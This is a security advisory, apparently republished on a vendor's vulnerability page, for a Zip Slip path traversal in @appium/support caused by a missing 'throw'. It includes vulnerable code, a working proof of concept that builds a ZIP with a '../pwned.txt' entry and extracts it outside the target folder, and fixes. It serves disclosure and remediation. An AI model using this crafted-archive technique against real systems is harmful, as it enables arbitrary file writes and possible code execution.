Summary
@appium/support contains a ZIP extraction implementation (extractAllTo() via ZipExtractor.extract()) with a path traversal (Zip Slip) check that is non-functional. The check at line 88 of packages/support/lib/zip.js creates an Error object but never throws it, allowing malicious ZIP entries with ../ path components to write files outside the intended destination directory. This affects all JS-based extractions (the default code path), not only those using the fileNamesEncoding option.
Severity
Medium (CVSS 3.1: 6.5)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N
- Attack Vector: Network, malicious ZIP files can be supplied over the network (e.g., app packages via URL)
- Attack Complexity: Low, no special conditions required beyond providing a crafted ZIP
- Privileges Required: None, no authentication needed to supply a malicious archive
- User Interaction: Required, a user or automation system must initiate extraction of the attacker's archive
- Scope: Unchanged, impact stays within the file system permissions of the Appium process
- Confidentiality Impact: None, the vulnerability enables file writes, not reads
- Integrity Impact: High, arbitrary file write to any location writable by the process
- Availability Impact: None, no direct availability impact
Affected Component
packages/support/lib/zip.js,ZipExtractor.extract()(line 88) andZipExtractor.extractEntry()(lines 111-145)
CWE
- CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
Description
Missing throw renders Zip Slip protection non-functional
The ZipExtractor.extract() method contains a path traversal check intended to prevent Zip Slip attacks. However, the check creates an Error object as a bare expression without the throw keyword, making it a no-op:
// packages/support/lib/zip.js, lines 80-93
const destDir = path.dirname(path.join(dir, fileName));
try {
await fs.mkdir(destDir, {recursive: true});
const canonicalDestDir = await fs.realpath(destDir);
const relativeDestDir = path.relative(dir, canonicalDestDir);
if (relativeDestDir.split(path.sep).includes('..')) {
new Error( // <-- BUG: missing `throw`
`Out of bound path "${canonicalDestDir}" found while processing file ${fileName}`
);
}
await this.extractEntry(entry); // extraction proceeds unconditionally
The presence of a well-formatted error message and surrounding try/catch block (lines 95-99) strongly suggests the throw keyword was accidentally omitted.
yauzl does not provide its own traversal protection
The upstream yauzl library explicitly does not offer path traversal protection regardless of the decodeStrings setting. This means the vulnerability affects all JS-based extractions through ZipExtractor, not only those where fileNamesEncoding is set. The fileNamesEncoding option bypasses yauzl's string decoding (decodeStrings: false), but even with decodeStrings: true, yauzl passes through ../ path components without rejection.
Unprotected write sinks
The extractEntry method writes to attacker-controlled paths with no additional validation:
// packages/support/lib/zip.js, lines 111-145
const fileName = this.extractFileName(entry);
const dest = path.join(dir, fileName); // resolves ../pwned.txt outside dir
// ...
await fs.symlink(link, dest); // symlink creation (line 143)
await pipeline(readStream, fs.createWriteStream(dest, {mode: procMode})); // file write (line 145)
Additionally, _extractEntryTo() (line 263) used by readEntries() has no traversal check at all:
const dstPath = path.resolve(destDir, entry.fileName); // no validation
Default code path is vulnerable
The extractAllTo() function uses the JS-based ZipExtractor by default. The system unzip fallback (useSystemUnzip: true) must be explicitly enabled and only provides protection if the system binary succeeds:
// packages/support/lib/zip.js, lines 203-210
if (opts.useSystemUnzip) {
try {
await extractWithSystemUnzip(zipFilePath, dir);
return;
} catch (err) {
log.warn('unzip failed; falling back to JS: %s', err.stderr || err.message);
// Falls through to the vulnerable JS implementation
}
}
Proof of Concept
# 1) Install deps for the support package
cd packages/support
npm install --omit=dev --ignore-scripts --no-audit --no-fund --workspaces=false
# 2) Create a malicious ZIP containing a traversal entry
export WORK=/tmp/appium_zip_slip_poc
rm -rf "$WORK" && mkdir -p "$WORK/dest"
python3 - <<'PY'
import zipfile, os
work = os.environ['WORK']
zip_path = os.path.join(work, 'evil.zip')
with zipfile.ZipFile(zip_path, 'w') as z:
z.writestr('../pwned.txt', 'ZIPSLIP_MARKER')
print('created', zip_path)
PY
# 3) Extract with the JS implementation (default path, no fileNamesEncoding needed)
node --experimental-default-type=module --experimental-specifier-resolution=node - <<'NODE'
import path from 'node:path';
import fs from 'node:fs/promises';
import { extractAllTo } from './lib/zip.js';
const work = process.env.WORK;
const zipPath = path.join(work, 'evil.zip');
const dest = path.join(work, 'dest');
await extractAllTo(zipPath, dest, { useSystemUnzip: false });
const outside = path.join(work, 'pwned.txt');
console.log('outside exists?', await fs.stat(outside).then(() => true, () => false));
console.log('outside content:', (await fs.readFile(outside, 'utf8')).trim());
NODE
# Expected output:
# outside exists? true
# outside content: ZIPSLIP_MARKER
Recommended Remediation
Option 1: Add the missing throw keyword (preferred, minimal fix)
// packages/support/lib/zip.js, line 88
if (relativeDestDir.split(path.sep).includes('..')) {
throw new Error( // Add `throw`
`Out of bound path "${canonicalDestDir}" found while processing file ${fileName}`
);
}
This is the lowest-risk fix: it restores the clearly intended behavior of the existing check. The try/catch block at lines 95-99 will catch the error, set canceled = true, close the zip, and reject the promise, exactly the designed error-handling flow.
Option 2: Add traversal protection to _extractEntryTo as well
The _extractEntryTo function (line 262) also lacks a traversal check. For defense-in-depth, add validation there too:
async function _extractEntryTo(zipFile, entry, destDir) {
const dstPath = path.resolve(destDir, entry.fileName);
const canonicalDest = path.resolve(dstPath);
const canonicalDestDir = path.resolve(destDir);
if (!canonicalDest.startsWith(canonicalDestDir + path.sep) && canonicalDest !== canonicalDestDir) {
throw new Error(
`Out of bound path "${canonicalDest}" found while processing file ${entry.fileName}`
);
}
// ... rest of function
}
Credit
This vulnerability was discovered and reported by bugbunny.ai.
Impact
- Arbitrary file write: An attacker can write files to any location writable by the Appium process, outside the intended extraction directory.
- Arbitrary symlink creation: Malicious ZIP entries with symlink attributes can create symlinks pointing to arbitrary targets, enabling further attacks on subsequent file operations.
- Potential code execution: By overwriting scripts, configuration files,
node_modulescontents, cron jobs, shell profiles, or other executable artifacts, arbitrary file write can chain into remote code execution. - Affects all JS-based extractions: The default code path (without
useSystemUnzip: true) is vulnerable regardless of whetherfileNamesEncodingis set.
Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files. Typical impact: unauthorized file read or write outside the intended directory.
CVE-2026-30973 has a CVSS score of 6.5 (Medium). The vector is network-reachable, no privileges required, and user interaction required. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (7.0.6); upgrading removes the vulnerable code path.
Affected versions
Security releases
Kodem intelligence
Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.
Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.
Remediation advice
Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.
Frequently Asked Questions
- What is CVE-2026-30973? CVE-2026-30973 is a medium-severity path traversal vulnerability in @appium/support (npm), affecting versions <= 7.0.5. It is fixed in 7.0.6. Input manipulates file paths to reach files outside the intended directory, such as configuration or credential files.
- How severe is CVE-2026-30973? CVE-2026-30973 has a CVSS score of 6.5 (Medium). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
- Which versions of @appium/support are affected by CVE-2026-30973? @appium/support (npm) versions <= 7.0.5 is affected.
- Is there a fix for CVE-2026-30973? Yes. CVE-2026-30973 is fixed in 7.0.6. Upgrade to this version or later.
- Is CVE-2026-30973 exploitable, and should I be worried? Whether CVE-2026-30973 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
- What actually determines whether CVE-2026-30973 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
- How do I fix CVE-2026-30973? Upgrade
@appium/supportto 7.0.6 or later.